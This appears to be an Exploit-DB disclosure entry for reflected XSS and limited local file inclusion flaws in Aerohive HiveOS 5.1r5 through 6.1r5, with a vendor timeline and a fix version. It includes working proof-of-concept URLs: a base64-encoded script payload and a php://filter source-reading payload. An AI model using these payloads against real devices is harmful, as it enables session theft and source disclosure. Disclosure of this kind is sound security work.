Aerohive HiveOS 5.1r5 - 6.1r5 - Multiple Vulnerabilities

2014-07-12T00:00:00
ID EDB-ID:34038
Type exploitdb
Reporter DearBytes
Modified 2014-07-12T00:00:00

Description

Aerohive HiveOS 5.1r5 - 6.1r5 - Multiple Vulnerabilities. Webapps exploit for php platform

                                        
                                            # Exploit Title: Aerohive HiveOS XSS and (limited) LFI
# Date: 11-07-2014
# Exploit Author: Rik van Duijn - DearBytes (dearbytes.com)
# Vendor Homepage: http://www.aerohive.com/products/overview.html
# Version: 5.1r5 - 6.1r5 (possibly earlier versions)

Description
================
Aerohive version 5.1r5 through 6.1r5 contain two vulnerabilities, one reflective XSS vulnerability and a limited local file inclusion vulnerability (I was only able to view source from one specific folder, maybe you can leverage this further). 
It's possible earlier version are affected, I was only able to review 5.1r5 briefly, the vendor indicated other version up to 6.1r5 are vulnerable as well.

Details
================
AeroHive  HiveOS Version:  5.1r5 until 6.1r5 (maybe available in earlier versions, was unable to test)
 
 
Vulnerability
================
An attacker could craft an URL in order to steal a session or attack the system of the visitor to the URL. The LFI can be leveraged to view application source code, limited to one specific folder.

 
Proof of concept XSS
====================
Base: http://<IP>/index.php5?ERROR_INFO=<BASE64 ENCODED JAVASCRIPT/HTML>
echo -en '"><script>alert('XSS');</script>' | base64
Add the output to the ERROR_INFO variable.

Example:
http://<IP>/index.php5?ERROR_INFO=Ij48c2NyaXB0PmFsZXJ0KERlYXJCeXRlcyk7PC9zY3JpcHQ+

Proof of concept LFI
====================
Base: http://<IP>/action.php5?_action=get&_actionType=1&_page=<LFI>

Example:
http://<IP>/action.php5?_action=get&_actionType=1&_page=php://filter/convert.base64-encode/resource=ManagementAP


Fix
================
The vulnerabilities were resolved in version 6.1r5.
 
 
Disclosure Timeline
================
 
2014-03-12: Reported to vendor
2014-03-12: Vendor confirmed, gave tracking-id
2014-03-18: Vendor confirms issues, states it received the vulns earlier and is already addressing the issues.
2014-04-02: Requested status update
2014-04-02: Vendor indicates they once the new version is released
2014-07-07: Requested status update
2014-07-07: Vendor indicated the update was previously published